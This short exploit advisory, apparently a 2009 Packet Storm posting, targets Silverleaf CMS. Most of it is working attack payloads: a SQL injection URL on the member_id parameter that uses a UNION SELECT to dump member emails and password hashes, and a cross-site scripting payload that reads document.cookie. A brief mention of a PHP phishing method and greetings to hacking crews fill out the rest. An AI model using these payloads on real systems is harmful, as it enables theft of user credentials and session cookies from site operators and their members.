silverleafcms-sql.txt
Posted on 11 August 2009
################################################# # Silverleaf CMS SQL Injection & XSS Vulnerable # # ################################################# ----'' Info '' ----- [+] CMS is Silverleaf [+] http://silverleafcms.com/ [+] Injection Part is: member_id= ############################################################################# Go Vulnerable like :: www.silverleafvuln.cms.com/?sec=member&member_id='SQL Injection SQL Injection :: www.silverleafvuln.cms.com/?sec=member&member_id=1 +and+1=0+union+select+[columns],group_concat(email,0x3a,pwd)+from+members-- ############################################################################# XSS with SQL ERROR for this Injection :: http://www.silverleafvuln.cms.com/?sec=member&member_id= <script>alert(document.cookie)</script> PHP Phishing Method over <php echo ... including ############################################################################# [+] Written & found by trisn [+] visit acceptthefuture.wordpress.com [+] visit free-hack.com [+] visit 1nj3ct-Crew Greetz out to Lolly, Fred777, _KiNG , big earl PAN , Kulverstukas , loverboy , Ice Dragon & Power-Sven -- much more names [6.08.2009] // packetstormsecurity.org ##############################################################################
